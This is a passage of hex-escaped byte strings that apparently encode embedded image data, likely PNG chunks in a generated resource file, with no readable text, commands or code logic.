xda\\xaf\\x17\\xda\\xcc\\x23\\x4f\\\n\\xec\\xaa\\x74\\x4e\\x79\\x94\\xf5\\xbb\\x93\\x48\\xb1\\x78\\xbd\\xfc\\x6f\\xf1\\\n\\x7e\\xab\\x74\\xc8\\xf9\\x6b\\x34\\x05\\xf9\\xf1\\x85\\x38\\x8d\\xb9\\xbd\\x81\\\n\\xc3\\xfd\\xbc\\x3a\\xfa\\xd4\\x53\\xc5\\x6c\\x5c\\xd4\\xcf\\x07\\x5e\\xc6\\xb4\\\n\\x53\\xc5\\x17\\x8a\\xc5\\x77\\x93\\x17\\xe7\\x16\\x17\\x65\\x55\\x8b\\xbd\\xd8\\\n\\x22\\x4b\\xa1\\x4c\\xb1\\x6e\\xec\\xfa\\x19\\xf2\\xfd\\x4c\\x05\\x69\\xc8\\x57\\\n\\xf1\\x75\\x56\\xae\\x0d\\xe1\\xc7\\x5f\\x25\\x44\\x61\\x9c\\x10\\x9a\\x81\\xd8\\\n\\xf6\\x16\\x83\\x1c\\x17\\x17\\xad\\xc5\\x3e\\x35\\x30\\x85\\xfe\\x56\\xd8\\xcf\\\n\\xb7\\x5b\\xe7\\xeb\\x95\\x1b\\xb9\\xef\\xc1\\xb6\\xaf\\x6d\\xf6\\x1e\\x6e\\xc4\\\n\\x8a\\xe0\\x57\\xfb\\x39\\x3b\\xb1\\x61\\x54\\x86\\x6e\\x7d\\x79\\x35\\xd0\\xa2\\\n\\xaf\\xc1\\xac\\x69\\xc1\\x71\\x7c\\xcc\\x64\\x44\\x39\\x57\\xd0\\x89\\x03\\x7e\\\n\\x94\\xe6\\x86\\x40\\x68\\x8b\\x2b\\xce\\x35\\x2d\\xde\\x8d\\xe3\\x7e\\xcd\\x75\\\n\\x1f\\xa6\\xf9\\x47\\x23\\x5c\\x6e\\x8c\\x7b\\xc8\\xf7\\x6b\\x3c\\x3a\\xb6\\x32\\\n\\xf1\\x5d\\x4c\\xd4\\x97\\x1d\\x77\\x12\\x35\\xc6\\xae\\x51\\x36\\xc1\\xe7\\x09\\\n\\xf4\\x46\\xc1\\x62\\xf9\\xcf\\x69\\x2c\\xe4\\x6c\\x41\\x25\\x77\\xae\\xee\\xd5\\\n\\x91\\x75\\x2b\\x52\\x1c\\x8b\\x1f\\xcc\\xe3\\xec\\x37\\x91\\x1e\\x60\\xf4\\xe6\\\n\\xee\\x55\\x8b\\xb6\\xec\\x38\\x3f\\x9e\\xca\\x16\\x51\\x65\\xe5\\x63\\xe5\\x8a\\\n\\x12\\x97\\x58\\x1b\\xb1\\xfa\\x93\\xf0\\x07\\xc1\\x67\\xec\\x26\\x7e\\xdc\\x0a\\\n\\x7b\\x07\\x7c\\x4a\\x88\\x3c\\x38\\x51\\xa4\\x43\\x61\\x67\\x9c\\xde\\x46\\x9b\\\n\\xe8\\x94\\x8d\\xe9\\x18\\x7a\\x83\\x1f\\x6b\\x26\\x1c\\xe8\\x3a\\xb4\\x58\\x9d\\\n\\xf0\\xf3\\xdf\\xd1\\xcc\\x8c\\x2c\\x87\\xf0\\xed\\x90\\xfd\\x41\\x3b\\x71\\x20\\\n\\x8b\\x3c\\x6a\\x62\\xdb\\xc5\\x48\\x18\\x98\\xc4\\x8c\\x69\\x46\\x73\\xa5\\xb1\\\n\\x89\\x2b\\xa6\\x83\\x2a\\xd3\\x7d\\x36\\xf0\\x40\\xdb\\x2a\\xbf\\x44\\xbc\\xd3\\\n\\x14\\x36\\x0e\\x7a\\xce\\x6a\\xde\\xfd\\x45\\x56\\x7f\\xc3\\x88\\xbe\\x8d\\xb1\\\n\\x93\\x53\\x8c\\xc3\\x2c\\x13\\xd3\\xc9\\x95\\x29\\xf6\\xbf\\x78\\x9f\\x65\\x9c\\\n\\x73\\x59\\xfd\\x62\\x7e\\xac\\x6e\\x91\\xa3\\x1e\\x12\\x66\\xb2\\x57\\x93\\x9e\\\n\\xca\\xdc\\xc9\\x81\\xcb\\xfd\\x84\\x10\\x4a\\xb0\\x46\\x67\\x34\\x84\\x30\\x99\\\n\\x97\\x1d\\xc3\\x21\\x17\\x90\\x0e\\x18\\x4d\\x19\\xaa\\x16\\x84\\x55\\x0b\\xb5\\\n\\x7c\\xfd\\x2a\\x0e\\x30\\x7f\\x8d\\x2a\\xa9\\x4a\\x99\\x68\\x39\\x8f\\x14\\x97\\\n\\xe2\\x4b\\xac\\x59\\x1d\\x02\\x54\\x9c\\x21\\xa8\\x1f\\x37\\x15\\xcd\\xe1\\xf6\\\n\\x36\\x74\\x93\\x8c\\xfe\\x3e\\x8b\\xdf\\x74\\xb1\\x6f\\x09\\x06\\x82\\x3a\\x69\\\n\\xce\\x53\\xb8\\xfe\\x96\\x46\\xb3\\xc5\\x67\\xef\\xe3\\xbe\\xff\\xa2\\xf9\\x00\\\n\\xfe\\x8d\\xe6\\x1a\\x2e\\x6f\\xf1\\x31\\x5d\\xba\\x48\\xd8\\xda\\xa8\\x89\\x6d\\\n\\x17\\xa3\\xc9\\x9c\\x1e\\xfa\\xa7\\xe4\\xd2\\xca\\xc4\\x6c\\x31\\xc2\\x52\\xb5\\\n\\xa2\\xff\\xd3\\xf8\\x76\\xe0\\x58\\x8b\\xf7\\x35\\x39\\xe5\\xd7\\x5c\\xf5\\x29\\\n\\x86\\x6e\\x37\\xbe\\x90\\x7a\\xd9\\xf5\\x8b\\x04\\xb1\\xaa\\x6c\\x96\\x5e\\xc6\\\n\\x09\\xc7\\xda\\x2a\\x4e\\xd8\\x45\\xc4\\x24\\x01\\xb1\\xfc\\xac\\xaf\\xcf\\xc4\\\n\\x6b\\xe8\\xdf\\x2b\\x48\\x98\\xbf\\x2b\\xec\\x24\\x54\\xa3\\x1c\\x33\\xf0\\x89\\\n\\xfe\\xb6\\xb5\\xf1\\x0b\\x8c\\x4c\\x2a\\x55\\x92\\x89\\xfc\\x42\\x6c\\xbc\\x6a\\\n\\x8a\\xd8\\x22\\x32\\xb6\\xc0\\x9b\\x08\\x17\\x9c\\xaf\\xdf\\xc0\\x72\\x61\\x97\\\n\\x9e\\x5f\\x71\\xe3\\x70\\x08\\x50\\xf1\\x4f\\x2a\\x5c\\x7a\\x26\\x80\\xfe\\x06\\\n\\x03\\x79\\xd7\\x9f\\xb2\\xb1\\x5b\\xec\\xd7\\x2e\\x21\\x68\\xc4\\x6c\\xdd\\x3d\\\n\\x5f\\xdf\\xd9\\xe4\\xfc\\xeb\\xb9\\xea\\xf3\\xdc\\x73\\x7f\\x08\\xec\\xf1\\x3a\\\n\\x9b\\x26\\x09\\xd8\\x21\\xd1\\xcd\\x2f\\x6f\\x67\\x47\\x9a\\xb0\\x60\\x32\\xe9\\\n\\x64\\xe5\\xba\\xc9\\x2a\\xce\\xad\\xec\\x7c\\x1d\\x1e\\x0b\\xe9\\xe3\\xd9\\x81\\\n\\x63\\x08\\x57\\xb7\\x38\\xfd\\x11\\xde\\x77\\x71\\xdb\\x62\\x79\\xbd\\xd1\\x83\\\n\\x27\\x4f\\xf4\\x8b\\xfd\\x8a\\x4d\\x9c\\x31\\xce\\x38\\xc6\\xbd\\xe4\\xf3\\x8a\\\n\\xf7\\x54\\x26\\x42\\x2f\\x2b\\x5f\\x6c\\x2f\\x36\\x49\\x0f\\x0b\\x2c\\xc4\\x05\\\n\\xa4\\x4b\\x39\\xa2\\x11\\xb6\\x21\\xfd\\x9f\\x6a\\x17\\xa1\\x22\\x52\\x2c\\xc6\\\n\\x65\\x7b\\x70\\xe1\\x05\\xf4\\x1f\\x6a\\x64\\x03\\x01\\xaa\\xc7\\x61\\x55\\x99\\\n\\xa2\\x94\\xa6\\x38\\xb6\\xaa\\xd4\\x12\\x65\\xe8\\x24\\xb6\\x4d\\x04\\xfd\\xc1\\\n\\xe7\\x18\\x7c\\x90\\x4f\\xb5\\x82\\x11\\xd4\\x4f\\x6d\\x3e\\x77\\x95\\xbe\\x9e\\\n\\x10\\xb0\\x7f\\x4c\\xbf\\x62\\xba\\xe9\\x7c\\x9f\\xa7\\x87\\xc7\\xba\\xe7\\x66\\\n\\xea\\xc7\\x96\\x42\\x13\\x57\\x25\\x9c\\x36\\xcc\\xd1\\x78\\x83\\x9d\\x74\\x93\\\n\\xf8\\x32\\xd4\\xc4\\xb6\\x7b\\xd1\\xc4\\x81\\x33\\x8d\\xe5\\x24\\xcb\\x3e\\xd0\\\n\\xa2\\x08\\xb6\\x58\\x27\\xc3\\x23\\x58\\xcf\\xb2\\xe4\\xc9\\x90\\xa5\\xe3\\xc2\\\n\\x4a\\xbc\\x67\\x23\\x2f\\xb9\\x9e\\x9f\\xff\\x1b\\x43\\xb7\\x45\\xfa\\x56\\xec\\\n\\x4b\\xf1\\xda\\x55\\x9c\\x66\\x8c\\x3b\\x2d\\x9b\\x88\\x8a\\xed\\xe6\\xdb\\x2a\\\n\\x23\\xfa\\xf9\\xbc\\x62\\x7e\\xb1\\x8f\\xbd\\xc2\\xbe\\xc0\\xe7\\x32\\x63\\x7a\\\n\\x88\\x0e\\x74\\xb1\\x40\\x5c\\xea\\x6f\\x26\\x3c\\x83\\x17\\xe2\\xdb\\x87\\xb1\\\n\\xf4\\xb5\\xa4\\x7b\\x18\\x1d\\xdb\\xb8\\x4c\\xd7\\x1a\\x53\\x6f\\xc4\\x16\\x5c\\\n\\x55\\xea\\x88\\x32\\x71\\x6b\\x0c\\xb1\\x05\\x58\\xfe\\x9a\\x05\\x97\\x9e\\xbb\\\n\\x36\\x70\\x01\\xfe\\xca\\x66\\x26\\x14\\x3d\\x4c\\x9b\\x92\\x8b\\x21\\x5c\\xec\\\n\\x4b\\x6c\\xdc\\x67\\x68\\x7b\\x23\\x74\\xb3\\x18\\x39\\x43\\xb3\\x15\\x7c\\x6e\\\n\\x97\\x61\\x70\\x5b\\x77\\xa6\\xdb\\x50\\x4f\\x1c\\xdd\\x8b\\x46\\x8b\\x85\\xb3\\\n\\xda\\xc6\\x51\\x8c\\x9d\\x64\\x8a\\x13\\x48\\x8c\\x83\\xcc\\xe7\\x25\\x02\\x71\\\n\\x7c\\x00\\x1b\\x42\\xf8\\xb4\\x89\\x46\\x74\\x19\\x12\\x22\\xc1\\xbc\\x74\\x19\\\n\\xef\\xbb\\x84\\x15\\x97\\x1b\\xcd\\xe5\\x56\\x89\\x06\\x63\\xf7\\x50\\x26\\xfe\\\n\\x2d\\x9b\\x6c\\xcb\\x26\\xdd\\x4e\\xa2\\x48\\x85\\xb2\\xb1\\x72\\xc5\\xb6\\x9a\\\n\\x82\\x03\\xee\\x85\\xf4\\x1e\\xc4\\xc9\\x82\\x58\\x79\\x67\\x37\\x9e\\xea\\xc7\\\n\\x5b\\x1b\\x7c\\xe1\\x04\\x16\\xbc\\x84\\xb4\\xd7\\xd8\\x0d\\x2d\\x28\\x97\\x30\\\n\\x94\\x89\\x71\\x15\\xf2\\x8a\\xf5\\xca\\x88\\xeb\\x78\\xde\\x73\\x19\\xd1\\xff\\\n\\x3d\\x3e\\xcf\\xe0\\x1d\\x7c\\xbd\\xc9\\xe9\\xc2\\x86\\x15\\x9b\\x5b\\xf4\\x99\\\n\\x62\\xc6\\xd4\\x1c\\xb1\\x2d\\xbb\\xcf\\x62\\x1f\\x5b\\x9e\\xf4\\x47\\x9b\\xb3\\\n\\xd7\\x66\\xee\\x54\\x8d\\xad\\x8b\\x9a\\xd8\\x76\\x2f\\x06\\x30\\x77\\x77\\xa3\\\n\\xc3\\xda\\xc5\\x44\\x71\\x45\\x8e\\x2e\\xbf\\x5a\\x2e\\xd6\\xeb\\xc1\\xbd\\x41\\\n\\x5f\\xfb\\xfb\\xd6\\xa6\\xeb\\xa2\\x96\\xe1\\x3d\\x83\\x9c\\x73\\x1d\\x3f\\xfd\\\n\\xb7\\x76\\xf4\\xa9\\xfc\\x5e\\xb9\\x65\\x0b\\x84\\x2a\\x54\\x4d\\x8e\\x65\\x6d\\\n\\x95\\x11\\xd8\\x32\\x02\\x5e\\xf5\\xcc\\x62\\x0b\\x80\\xcc\\x45\\xe8\\x1c\\xd2\\\n\\x53\\x98\\xd7\\x0e\\x84\\xf1\\x5e\\x3b\\xa7\\xf1\\xd4\\x1c\\x7c\\x70\\x80\\xf7\\\n\\x9f\\xc5\\xf4\\x13\\x55\\xab\\x0d\\xa8\\x7e\\x8f\\xd9\\x71\\x99\\x88\\xbf\\x8a\\\n\\x73\\x8d\\xbd\\xc7\\xb2\\x77\\x1e\\x5b\\x5c\\xad\\xc5\\xe5\\xf8\\x26\\x0f\\xac\\\n\\xe2\\x1d\\x82\\x7e\\xf1\\xe6\\x48\\x13\\x9b\\x05\\x2d\\x66\\xc4\\xf4\\x10\\x31\\\n\\x8e\\x3b\\xff\\x4c\\x5a\\x18\\x08\\x9b\\x35\\xec\\xf5\\x78\\xed\\x07\\xbe\\x5d\\\n\\xa3\\x26\\xb6\\x5d\\x8a\\x1e\\xa6\\x4f\\x62\\xce\\x4c\\xe5\\x56\\x9d\\xc5\\x8f\\\n\\x32\\x96\\x57\\x24\\xc0\\x43\\xc2\\xde\\x92\\x82\\x8a\\xea\\xa9\\x60\\x48\\x70\\\n\\x89\\x38\\x67\\x19\\xef\\xfb\\x1a\\x2b\\xae\\x10\\x64\\x47\\x31\\x0e\\x3c\\x43\\\n\\x71\\x62\\x2d\\xa6\\x65\\xe9\\x55\\xa2\\xc8\\xe2\\x3d\\x57\\x89\\x98\\x8b\\xa2\\\n\\xf5\\xb2\\xc9\\xbd\\x4c\\x24\\x9f\\x3f\\x3f\\x0e\\xe7\\x33\\x30\\x93\\xff\\x9e\\\n\\xf0\\x05\\x1c\\x62\\xe7\\xf8\\x86\\x52\\x2c\\x4e\\xf8\\xfc\\x6c\\xde\\xf8\\x4a\\\n\\xfa\\x0e\\x36\\xa2\\xcc\\xac\\x12\\xe1\\x96\\xe5\\xc5\\x44\\xc6\\xf9\\x7a\\x31\\\n\\x0e\\x98\\xb1\\xef\\xa8\\x8a\\x33\\x8c\\x8d\\x93\\x54\\x10\\xe9\\x7c\\x81\\xa1\\\n\\xeb\\xf9\\xe9\\xc6\\x10\\xd7\\xf8\\xc3\\x36\\x8f\\x11\\x54\\x29\\x9a\\xcc\\xc9\\\n\\x07\\xf6\\x28\\xe3\\xe6\\x63\\xe3\\xb9\\x0f\\xbb\\x32\\x7d\\xb0\\xfb\\x8d\\xa4\\\n\\x6a\\x54\\xa0\\x7e\\x71\\x5d\\x8a\\x66\\x08\\x27\\x38\\x7b\\x37\\x63\\x27\\x9f\\\n\\x32\\x54\\x19\\x5b\\x64\\x78\\x18\\x6b\\x83\\x9a\\xea\\x6a\\x9b\\xc7\\x24\\x7f\\\n\\x99\\xa0\\xcb\\x3d\\xe7\\x5a\\xae\\xfe\\x0c\\x43\\x7f\\x34\\xb2\\xa9\\x41\\x55\\\n\\x5f\\xca\\x44\\x88\\xc5\\xfc\\x58\\x99\\xf1\\x4c\\xf0\\x31\\x71\\x65\\x4c\\x32\\\n\\x90\\x21\\x26\\x11\\xc8\\x5f\\x67\\x48\\xd8\\xbc\\xe1\\x42\\xd2\\x83\\x38\\x39\\\n\\x0d\\xf1\\x5e\\xcf\\xd6\\xc5\\x41\\xe2\\x37\\x03\\x1a\\x78\\x7e\\xca\\x25\\x07\\\n\\x72\\xf2\\x05\\xa4\\x73\\x8c\\x8d\\x06\\x55\\xc6\\x69\\x96\\x49\\x38\\xf2\\xe9\\\n\\x31\\x69\\x48\\xd5\\x82\\x4d\\x24\\x6d\\x3c\\xef\\x76\\x18\\x3f\\xc1\\x57\\x58\\\n\\xf5\\x50\\x20\\xb0\\xe7\\xe0\\xe7\\xb6\\x8e\\x6b\\xca\\xde\\xbb\\x18\\xdf\\x77\\\n\\xcc\\xe8\\x7b\\x6b\\x60\\x17\\xfa\\x07\\xc3\\xf6\\x84\\x35\\xb6\\x53\\xd4\\xc4\\\n\\xb6\\x3b\\x91\\x62\\xd1\\x14\\x06\\xb2\\x1d\\x7f\\x88\\x4f\\x4c\\x72\\x79\\x45\\\n\\x1d\\x66\\x3e\\x8f\\xf0\\xd1\\xde\\x89\\x0d\\xdc\\xd8\\xda\\xbc\\x8e\\xe6\\x19\\\n\\x97\\x7b\\xda\\x0a\\xfe\\xe9\\x8b\\xac\\xfe\\xae\\xe0\\x97\\x9b\\x1f\\x60\\xb1\\\n\\x09\\x73\\x3c\\x04\\xb7\\x6c\\x82\\x2a\\x9b\\x90\\xab\\x74\\xb7\\x55\\xba\\xbc\\\n\\xb2\\xe3\\x22\\x97\\xdd\\x2f\\x88\\x95\\x9f\\xcb\\xc2\\x29\\x7c\\x56\\x30\\xa0\\\n\\xda\\x11\\xc5\\xca\\xbd\\x78\\x65\\x83\\x2f\\x2c\\xe5\\xa0\\x73\\x85\\x7b\\xcf\\\n\\x28\\x53\\x4c\\x4a\\x51\\x3c\\xaf\\x52\\x7f\\x94\\xd5\\xed\\xd4\\x76\\xac\\x6e\\\n\\xd5\\x82\\xae\\x47\\x30\\x4e\\xf8\\x22\\xcd\\x1f\\x73\\xf3\\x60\\x88\\x02\\xf5\\\n\\x0e\\x5b\\xc9\\x5a\\x76\\x6f\\xa4\\xcc\\xea\\x33\\xfa\\xfb\\x8d\\x89\\x8f\\xcb\\\n\\x30\\x2d\\x30\\xb8\\x7b\\xe9\\x7e\\x9f\\xd5\\x9a\\xa6\\x94\\xa0\\x7e\\x30\\xdd\\\n\\x8b\\x43\\x67\\xd2\\xcc\\x5b\\xe2\\x54\\x4d\\x28\\x55\\xc8\\x88\\x55\\x7b\\xa3\\\n\\xeb\\x66\\x12\\x36\\x71\\x5e\\xb3\\x19\\xfa\\x58\\xc4\\x4a\\xfc\\xfd\\x30\\xa7\\\n\\xff\\x92\\x1b\\x3e\\xcd\\xd0\\xdd\\xca\\x77\\x12\\xaa\\x22\\x7a\\x79\\xc2\\x58\\\n\\xc6\\x69\\xc6\\x08\\x71\\xb1\\x4e\\xd9\\x44\\x1e\\x23\\xbc\\xb1\\xf2\\x65\\xe2\\\n\\xcb\\xa6\\xb0\\x4d\\xe1\\x79\\x0c\\xcc\\xe0\\x7f\\xb4\\xc5\\xca\\x3b\\xd2\\x86\\\n\\x06\\xfd\\xf8\\xef\\x7d\\x7c\\xf4\\x54\\x66\\x9f\\xda\\x4e\\x2c\\x13\\xc1\\x67\\\n\\x79\\x31\\xa2\\x5a\\x7c\\x67\\x55\\xa2\\xe5\\x62\\xbd\\xf1\\x70\\x81\\x31\\x55\\\n\\x41\\x86\\x1e\\x5c\\x87\\xcf\\x32\\xf8\\x27\\xbe\\xd8\\xe2\\x05\\x82\\xba\\x76\\\n\\xab\\xed\\x40\\xb3\\x9a\\xde\\xc9\\xcc\\x9e\\x5a\\x30\\x76\\x1c\\x8f\\x18\\x3c\\\n\\xbb\\x97\\x99\\xc1\\xb8\\x6a\\xd1\\x96\\xec\\xe7\\x66\\xc0\\x1c\\xa1\\x8f\\x8b\\\n\\x30\\x2f\\x61\\x56\\xca\\xb4\\x24\\x8c\\xa5\\x9d\\xd9\\xa8\\x10\\x3b\\xce\\xc4\\\n\\xb0\\xa3\\xa1\\xd1\\xe2\\x90\\xbd\\x0b\\x1f\\x67\\x8c\\x10\\x94\\xe9\\x7e\\xf2\\\n\\x75\\xb2\\x0f\\x7b\\x0d\\x1e\\x0e\\x74\\xe2\\xca\\x2d\\xd2\\xeb\\x11\\xfc\\x14\\\n\\xcf\\x5b\\xc1\\xff\\xfd\\x02\\x6b\\xbe\\x63\\xf4\\x4e\\x42\\x9d\\xb8\\xd4\\xaa\\\n\\x49\\xbc\\x8a\\x33\\x10\\x29\\x53\\x6c\\x3f\\x7f\\x8d\\x18\\xaa\\x44\\xcb\\xc5\\\n\\xf4\\x8d\\x98\\x8f\\xd7\\x93\\x2e\\xe2\\xd4\\x84\\xcb\\x84\\x20\\x18\\xdb\\xfb\\\n\\x77\\x35\\x03\\x1f\\xda\\x85\\x77\\x9d\\xcb\\xc0\\x33\\x8c\\xa5\\x4c\\x65\\x44\\\n\\x22\\xff\\x8e\\x63\\xc4\\x93\\xf2\\xe7\\x59\\xac\\x57\\xd6\\x7e\\xbe\\x0f\\x65\\\n\\xef\\x3d\\x7b\\x3f\\x5f\\xc2\\x65\\x3c\\xb4\\x8e\\x3f\\x13\\x7c\\x3f\\xef\\xa9\\\n\\x68\\x7e\\x8b\\x60\\x90\\xfe\\x5e\\xa6\\x17\\x83\\xd3\\xe4\\x8f\\x3b\\x8d\\xc7\\\n\\xd9\\xc1\\xad\\xe6\\x00\\xdd\\x3b\\xb6\\x52\\x61\\xcb\\xca\\x5f\\xe3\\x77\\x0d\\\n\\x6e\\x4a\\xb9\\x0d\\xd7\\xb7\\xf8\\x16\\x3e\\x9a\\xf2\\xfa\\x84\\x83\\xda\\xc4\\\n\\xb7\\x5b\\xef\\x63\\x8b\\x61\\xa7\\x5f\\x6d\\x74\\x29\\x66\\xa7\\x2c\\xdc\\x53\\\n\\xd0\\x33\\x11\\xd7\\x7d\\xc5\\x74\\x91\\x65\\x62\\xe6\\x14\\x7f\\xc4\\x46\\xee\\\n\\x4a\\xb8\\xb5\\xb5\\xe5\\xc5\\x51\\xab\\xf0\\x8e\\x61\\xbe\\x7d\\x35\\x1f\\xba\\\n\\x83\\x25\\x2f\\x26\\x5d\\x18\\xfa\\xd0\\x51\\xf7\\x9a\\x21\\x36\\x29\\x15\\x27\\\n\\xd5\\xd8\\x22\\x63\\xbc\\x65\\xca\\x16\\x2b\\x31\\xbd\\x6f\\x8c\\xbb\\x6e\\x0a\\\n\\xf2\\xbd\\x97\\xe3\\x4a\\x16\\xfd\\x82\\x4b\\x5a\\xfc\\xad\\x10\\x47\\xb7\\xdb\\\n\\x45\\x7e\\x31\\xec\\x95\\xf0\\xf9\\xdd\\x38\\xf1\\x7c\\xd2\\x59\\x46\\x13\\xda\\\n\\xd8\\xb3\\xcd\\x1f\\xe7\\x7f\\xab\\xb8\\xb8\\xd8\\x7b\\xe8\\xa4\\x83\\x8d\\xbd\\\n\\xb3\\x18\\xf7\\x3b\\x09\\xb7\\xe3\\x1b\\x21\\x64\\xe0\\x4f\\x05\\x22\\x7b\\x97\\\n\\x6d\\xf4\\x3e\\x06\\xe9\\x9f\\x16\\x08\\xee\\x28\\x54\\x8d\\xb1\\x7c\\x99\\x96\\\n\\xb0\\xe5\\x4f\\x8b\\x05\\x49\\x20\\xba\\xdd\\x88\\x26\\xfe\\x05\\xfb\\xf6\\xf2\\\n\\xfa\\x57\\xd2\\xdb\\x8f\\xd5\\xcc\\x58\\xce\\xc2\\x07\\x38\\xe1\\x5e\\x9a\\x8f\\\n\\x86\\xfe\\xdf\\x9e\\x84\\x50\\x8e\\x5f\\x15\\xf6\\x2b\\x68\\xda\\x3e\\xbf\\x95\\\n\\x09\\xa1\\x2c\\x26\\x41\\x8d\\x6d\\x88\\x84\\x83\\x06\\x78\\xf3\\xb3\\x99\\x3c\\\n\\x49\\x20\\x94\\x65\\x5c\\x1c\\x63\\x27\\x9f\\x18\\x01\\x9b\\x8c\\x1f\\x62\\x19\\\n\\xdf\\x68\\x85\\x6d\\xc2\\xb6\\xd6\\xe0\\xfe\\x13\\xbe\\xb2\\x65\\x9d\\x1b\\xf3\\\n\\x00\\x00\\x20\\x00\\x49\\x44\\x41\\x54\\x8e\\xe6\\x8d\\x1c\\xf1\\x38\\x8d\\xfd\\\n\\x48\\xf2\\x7e\\xb9\\x65\\x2b\\xfb\\x4e\\x84\\x38\\x56\\xb6\\x53\\x3b\\x65\\x93\\\n\\x59\\xac\\x7c\\x8c\\xc0\\x96\\x71\\xcb\\x2d\\x81\\xed\\xd8\\x9d\\xc9\\x77\\x71\\\n\\xf2\\x10\\x73\\x85\\x89\\x7e\\x43\\xe7\\xde\\x77\\x0d\\x0e\\xc2\\x37\\xf7\\x65\\\n\\xe9\\x05\\x24\\xd9\\xd6\\x8e\\x79\\xc4\\x9e\\x65\\x51\\xcc\\x1f\\x7b\\x46\\x31\\\n\\xc9\\x45\\x27\\x71\\x72\\xd9\\xb5\\xaa\\xb8\\x6a\\xb8\\x02\\xdf\\x66\\xcd\\x20\\\n\\xff\\x2f\\xde\\x2c\\xa8\\x6c\\xb7\\x25\\x8d\\x9a\\xbb\\x1b\\xaf\\x3f\\x3a\\xc4\\\n\\xa7\\xc0\\xe8\\xfb\\x28\\x7e\\x03\\xb1\\x67\\x98\\x92\\x5c\\x4f\\xda\\xc7\\xbf\\\n\\x0e\\x6e\\x1d\\x11\\x78\\x36\\xed\\x94\\x3d\\xb7\\x34\\x92\\xb7\\x01\\xdf\\x1b\\\n\\x66\\xaf\\x3f\\xb1\\xe4\\x04\\x92\\x5d\\xb1\\x0f\\xc9\\xa1\\x38\\x96\\xe4\\xa8\\\n\\x60\\x60\\x37\\x73\\x03\\xcf\\x5a\\xcd\\xeb\\x5a\\x9c\\x98\\xf0\\xa8\\xb0\\x18\\\n\\x1a\\xb6\\x03\\xa3\\xe6\\x6c\\xbb\\x0f\\x69\\x8b\\xc3\\xa6\\x32\\x2d\\xf3\\xcb\\\n\\xab\\xd2\\x49\\x65\\x28\\x12\\x88\\x22\\x21\\x58\\x2f\\xac\\xf6\\x5b\\x5c\\x62\\\n\\xeb\\xaf\\x22\\x57\\xe3\\x5d\\x4d\\xbe\\xfb\\x2b\\x3e\\xf0\\x07\\x96\\xbe\\x48\\\n\\x20\\x4e\\xf9\\xcd\\x0d\\xe8\\x3c\\x01\\x13\\xe7\\x3c\\x8b\\x79\\x55\\x44\\xb5\\\n\\xac\\xad\\xd8\\x35\\x3b\\x89\\xfb\\xf2\\xe7\\x43\\x02\\xb5\\x9a\\x4d\\xef\\x97\\\n\\x79\\xfd\\x23\\xe1\\xf4\\x7c\\xdb\\x40\\x74\\x39\\x41\\xa4\\x38\\x1e\\xff\\x71\\\n\\x14\\x73\\x5e\\xd8\\x4e\\x8c\\x89\\x7f\\xf3\\xe7\\x59\\xda\\x78\\xdf\\x4d\\x99\\\n\\x1a\\xa4\\x4a\\x84\\x5a\\x36\\xd6\\x8b\\x12\\x8b\\x1e\\xdc\\x2f\\x70\\xb3\\xcb\\\n\\x03\\xb7\\xf4\\x67\\x82\\xba\\x76\\x9b\\x73\\x4c\\x49\\x3b\\x2e\\x72\\x6a\\xb4\\\n\\x15\\x77\\x99\\x58\\x3d\\x76\\x3e\\x19\\xbb\\x31\\x6d\\x65\\x30\\x92\\xba\\xdb\\\n\\xe6\\xbf\\xaf\\x6c\\xfd\\xdb\\x97\\x32\\xab\\xc5\\xac\\x24\\xfc\\x0e\\x24\\xf4\\\n\\x35\\x83\\xb1\\xdc\\xa0\\x30\\xcc\\x87\\x04\\xfb\\x8c\\xab\\x8d\\x0d\\x00\\x32\\\n\\x88\\xb7\\xaf\\x64\\xc9\\xa5\\x1c\\xf5\\x92\\x76\\xe1\\x2c\\x9c\\xd4\\x64\\x1c\\\n\\x42\\xba\\x04\\xab\\x68\\x5c\\xcd\\xb3\\xae\\xe7\\xd8\\xf5\\x5c\\x2b\\x48\\x84\\\n\\x7e\\xbe\\x99\\xef\\xab\\x6b\\x50\\x13\\xdb\\xee\\xc4\\xd1\\x7b\\xd2\\x9c\\x44\\\n\\x1a\\x23\\x46\\xb1\\x49\\xa8\\x4c\\xa4\\x97\\xe1\\x36\\x4f\\x8a\\x90\\xaf\\xde\\\n\\x0a\\x22\\xe4\\x18\\x9a\\xc2\\x87\\x74\\xfa\\x4a\\xfe\\xe2\\xcb\\xfc\\xb7\\xc3\\\n\\x99\\x76\\xb2\\xf0\\x15\\x97\\xdd\\x13\\xe5\\x22\\xdf\\xfc\\x02\\xa4\\x4a\\x44\\\n\\x99\\x1d\\xe7\\xeb\\x15\\xeb\\x2b\\xa9\\x13\\x13\\xd7\\x57\\x3d\\xfb\\x26\\x66\\\n\\xe2\\x0d\\xa4\\xdf\\xe0\\x59\\xb7\\x85\\x8d\\xe9\\x5f\\x25\\x4c\\x26\\xdb\\x7c\\\n\\xe2\\x8f\\x20\\xc5\\x99\\xf8\\xec\\x73\\x99\\xfe\\x1c\\x63\\xfd\\xba\\xab\\x08\\\n\\x68\\x3e\\xad\\x8a\\x78\\xc4\\xda\\xca\\x97\\x8d\\x8d\\xd9\\xaa\\xfc\\x22\\x17\\\n\\xf8\\x13\\xfc\\x9c\\xb5\\x83\\x41\\x7c\\xff\\x5e\\x13\\x8f\\x8e\\xb6\\xc5\\x90\\\n\\x30\\xa3\\x9f\\xde\\x8c\\xd8\\x12\\x1f\\x4f\\x55\\xdf\\x70\\x8a\\x5d\\x69\\x3c\\\n\\x18\\x24\\x26\\x77\\x6f\\x86\\x6e\\xa5\\xc2\\x02\\x60\\x71\\x8b\\x25\\xad\\x10\\\n\\xcf\\x78\\x31\\xe6\\x35\\x99\\xde\\x08\\x5c\\x74\\xa3\\x97\\x74\\x2a\\xe9\\xa3\\\n\\x58\\x13\\xba\\x9f\\xdd\\xc6\\x5d\\xc2\\x46\\x0d\\x77\\x45\\xda\\x5e\\x8d\\x3f\\\n\\xff\\x2d\\x3f\\x7b\\x06\\xbd\\xc5\\x38\\x93\\x2d\\x61\\x91\\x3d\\x15\\x27\\x91\\\n\\x1e\\x47\\xfa\\x13\\x8e\\xbd\\x8e\\x6f\\x0f\\x87\\xbd\\x6f\\xdf\\x65\\x07\\xdc\\\n\\x6c\\xbe\\x26\\xb6\\x5d\\x86\\x84\\x81\\x16\\x4b\\xe6\\x93\\x16\\x7d\\x19\\x27\\\n\\xd0\\xc6\\x28\\xf4\\x0a\\xfb\\xe5\\xe1\\x8a\\xd6\\x96\\xb1\\x42\\x9e\\x08\\x56\\\n\\x08\\x7e\\xb9\\x3f\\xba\\x9e\\xf7\\xdc\\xcd\\xb1\\x2f\\x6c\\xef\\x7d\\x